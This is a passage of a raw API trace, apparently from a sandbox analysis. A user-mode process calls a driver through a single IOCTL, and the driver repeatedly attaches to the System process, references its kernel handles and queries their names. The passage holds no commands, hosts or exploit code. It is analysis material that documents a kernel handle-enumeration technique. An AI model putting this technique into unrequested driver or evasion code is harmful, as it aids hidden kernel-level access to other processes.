ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.025] ObfDereferenceObject (Object=0xffffe00069038560) returned 0x8000 [0258.025] IoCompleteRequest () returned 0x0 [0258.025] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.025] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.025] PsAcquireProcessExitSynchronization () returned 0x0 [0258.025] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.025] ObReferenceObjectByHandle (in: Handle=0xffffffff800006b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069038070, HandleInformation=0x0) returned 0x0 [0258.025] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.025] PsReleaseProcessExitSynchronization () returned 0x2 [0258.025] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa4c [0258.025] ObQueryNameString (in: Object=0xffffe00069038070, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.025] ObfDereferenceObject (Object=0xffffe00069038070) returned 0x8000 [0258.025] IoCompleteRequest () returned 0x0 [0258.025] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x315480, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0258.025] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.025] PsAcquireProcessExitSynchronization () returned 0x0 [0258.025] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.025] ObReferenceObjectByHandle (in: Handle=0xffffffff800006b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.025] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.025] PsReleaseProcessExitSynchronization () returned 0x2 [0258.025] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa4b [0258.025] IoCompleteRequest () returned 0x0 [0258.025] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.026] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.026] PsAcquireProcessExitSynchronization () returned 0x0 [0258.026] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.026] ObReferenceObjectByHandle (in: Handle=0xffffffff800006b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069031ce0, HandleInformation=0x0) returned 0x0 [0258.026] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.026] PsReleaseProcessExitSynchronization () returned 0x2 [0258.026] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa4a [0258.026] ObQueryNameString (in: Object=0xffffe00069031ce0, ObjectNameInfo=0xffffe0006a7aa7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a7aa7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.026] ObfDereferenceObject (Object=0xffffe00069031ce0) returned 0x8000 [0258.026] IoCompleteRequest () returned 0x0 [0258.026] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x315480, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0258.026] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.026] PsAcquireProcessExitSynchronization () returned 0x0 [0258.026] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.026] ObReferenceObjectByHandle (in: Handle=0xffffffff800006bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.026] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.026] PsReleaseProcessExitSynchronization () returned 0x2 [0258.026] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa49 [0258.026] IoCompleteRequest () returned 0x0 [0258.026] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.026] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.026] PsAcquireProcessExitSynchronization () returned 0x0 [0258.026] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.026] ObReferenceObjectByHandle (in: Handle=0xffffffff800006c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069030680, HandleInformation=0x0) returned 0x0 [0258.026] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.026] PsReleaseProcessExitSynchronization () returned 0x2 [0258.026] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa48 [0258.026] ObQueryNameString (in: Object=0xffffe00069030680, ObjectNameInfo=0xffffe0006a3b07c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b07c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.026] ObfDereferenceObject (Object=0xffffe00069030680) returned 0x8000 [0258.027] IoCompleteRequest () returned 0x0 [0258.027] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x315480, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0258.027] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.027] PsAcquireProcessExitSynchronization () returned 0x0 [0258.027] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.027] ObReferenceObjectByHandle (in: Handle=0xffffffff800006c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.027] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.027] PsReleaseProcessExitSynchronization () returned 0x2 [0258.027] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa47 [0258.027] IoCompleteRequest () returned 0x0 [0258.087] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.087] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.087] PsAcquireProcessExitSynchronization () returned 0x0 [0258.087] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.087] ObReferenceObjectByHandle (in: Handle=0xffffffff800006c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006902f2a0, HandleInformation=0x0) returned 0x0 [0258.087] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.087] PsReleaseProcessExitSynchronization () returned 0x2 [0258.087] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa46 [0258.087] ObQueryNameString (in: Object=0xffffe0006902f2a0, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.087] ObfDereferenceObject (Object=0xffffe0006902f2a0) returned 0x8000 [0258.087] IoCompleteRequest () returned 0x0 [0258.087] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.087] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.087] PsAcquireProcessExitSynchronization () returned 0x0 [0258.087] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.087] ObReferenceObjectByHandle (in: Handle=0xffffffff800006d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006902fa50, HandleInformation=0x0) returned 0x0 [0258.087] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.087] PsReleaseProcessExitSynchronization () returned 0x2 [0258.087] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa45 [0258.087] ObQueryNameString (in: Object=0xffffe0006902fa50, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.087] ObfDereferenceObject (Object=0xffffe0006902fa50) returned 0x8000 [0258.087] IoCompleteRequest () returned 0x0 [0258.087] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x78, lpOverlapped=0x0) returned 1 [0258.088] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.088] PsAcquireProcessExitSynchronization () returned 0x0 [0258.088] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.088] ObReferenceObjectByHandle (in: Handle=0xffffffff800006d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069043990, HandleInformation=0x0) returned 0x0 [0258.088] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.088] PsReleaseProcessExitSynchronization () returned 0x2 [0258.088] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa44 [0258.088] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.088] ObfDereferenceObject (Object=0xffffe00069043990) returned 0x7fff [0258.088] IoCompleteRequest () returned 0x0 [0258.088] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.088] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.088] PsAcquireProcessExitSynchronization () returned 0x0 [0258.088] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.088] ObReferenceObjectByHandle (in: Handle=0xffffffff800006d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000691d1b30, HandleInformation=0x0) returned 0x0 [0258.088] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.088] PsReleaseProcessExitSynchronization () returned 0x2 [0258.088] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa43 [0258.088] ObQueryNameString (in: Object=0xffffe000691d1b30, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.088] ObfDereferenceObject (Object=0xffffe000691d1b30) returned 0x8000 [0258.088] IoCompleteRequest () returned 0x0 [0258.088] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x82, lpOverlapped=0x0) returned 1 [0258.088] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.088] PsAcquireProcessExitSynchronization () returned 0x0 [0258.088] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.088] ObReferenceObjectByHandle (in: Handle=0xffffffff800006dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069030ca0, HandleInformation=0x0) returned 0x0 [0258.088] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.088] PsReleaseProcessExitSynchronization () returned 0x2 [0258.088] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa42 [0258.088] ObQueryNameString (in: Object=0xffffe00069030ca0, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.088] ObfDereferenceObject (Object=0xffffe00069030ca0) returned 0x7ff7 [0258.088] IoCompleteRequest () returned 0x0 [0258.088] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.089] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.089] PsAcquireProcessExitSynchronization () returned 0x0 [0258.089] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.089] ObReferenceObjectByHandle (in: Handle=0xffffffff800006e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a387620, HandleInformation=0x0) returned 0x0 [0258.089] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.089] PsReleaseProcessExitSynchronization () returned 0x2 [0258.089] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa41 [0258.089] ObQueryNameString (in: Object=0xffffe0006a387620, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.089] ObfDereferenceObject (Object=0xffffe0006a387620) returned 0x8000 [0258.089] IoCompleteRequest () returned 0x0 [0258.089] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x82, lpOverlapped=0x0) returned 1 [0258.089] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.089] PsAcquireProcessExitSynchronization () returned 0x0 [0258.089] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.089] ObReferenceObjectByHandle (in: Handle=0xffffffff800006e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006902f680, HandleInformation=0x0) returned 0x0 [0258.089] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.089] PsReleaseProcessExitSynchronization () returned 0x2 [0258.089] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa40 [0258.089] ObQueryNameString (in: Object=0xffffe0006902f680, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.089] ObfDereferenceObject (Object=0xffffe0006902f680) returned 0x7ffe [0258.089] IoCompleteRequest () returned 0x0 [0258.089] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.089] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.089] PsAcquireProcessExitSynchronization () returned 0x0 [0258.089] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.089] ObReferenceObjectByHandle (in: Handle=0xffffffff800006e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006914c980, HandleInformation=0x0) returned 0x0 [0258.089] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.089] PsReleaseProcessExitSynchronization () returned 0x2 [0258.089] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa3f [0258.089] ObQueryNameString (in: Object=0xffffe0006914c980, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.089] ObfDereferenceObject (Object=0xffffe0006914c980) returned 0x8000 [0258.089] IoCompleteRequest () returned 0x0 [0258.090] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0xd2, lpOverlapped=0x0) returned 1 [0258.090] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.090] PsAcquireProcessExitSynchronization () returned 0x0 [0258.090] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.090] ObReferenceObjectByHandle (in: Handle=0xffffffff800006ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069362590, HandleInformation=0x0) returned 0x0 [0258.090] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.090] PsReleaseProcessExitSynchronization () returned 0x2 [0258.090] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa3e [0258.090] ObQueryNameString (in: Object=0xffffe00069362590, ObjectNameInfo=0xffffe0006840f7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006840f7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.090] ObfDereferenceObject (Object=0xffffe00069362590) returned 0x8000 [0258.090] IoCompleteRequest () returned 0x0 [0258.090] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.090] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.090] PsAcquireProcessExitSynchronization () returned 0x0 [0258.090] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.090] ObReferenceObjectByHandle (in: Handle=0xffffffff800006f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00079221340, HandleInformation=0x0) returned 0x0 [0258.090] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.090] PsReleaseProcessExitSynchronization () returned 0x2 [0258.090] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa3d [0258.090] ObQueryNameString (in: Object=0xffffe00079221340, ObjectNameInfo=0xffffe0006a7aa7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a7aa7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.090] ObfDereferenceObject (Object=0xffffe00079221340) returned 0x8000 [0258.090] IoCompleteRequest () returned 0x0 [0258.090] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x11c, lpOverlapped=0x0) returned 1 [0258.090] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.090] PsAcquireProcessExitSynchronization () returned 0x0 [0258.090] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.090] ObReferenceObjectByHandle (in: Handle=0xffffffff800006f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069368ce0, HandleInformation=0x0) returned 0x0 [0258.090] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.090] PsReleaseProcessExitSynchronization () returned 0x2 [0258.090] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa3c [0258.091] ObQueryNameString (in: Object=0xffffe00069368ce0, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.091] ObfDereferenceObject (Object=0xffffe00069368ce0) returned 0x8000 [0258.091] IoCompleteRequest () returned 0x0 [0258.091] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.091] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.091] PsAcquireProcessExitSynchronization () returned 0x0 [0258.091] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.091] ObReferenceObjectByHandle (in: Handle=0xffffffff800006f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069f5d1c0, HandleInformation=0x0) returned 0x0 [0258.091] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.091] PsReleaseProcessExitSynchronization () returned 0x2 [0258.091] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa3b [0258.091] ObQueryNameString (in: Object=0xffffe00069f5d1c0, ObjectNameInfo=0xffffe0006a3b07c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b07c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.091] ObfDereferenceObject (Object=0xffffe00069f5d1c0) returned 0x8000 [0258.091] IoCompleteRequest () returned 0x0 [0258.091] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x11c, lpOverlapped=0x0) returned 1 [0258.091] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.091] PsAcquireProcessExitSynchronization () returned 0x0 [0258.091] KeStackAttachProcess (in: 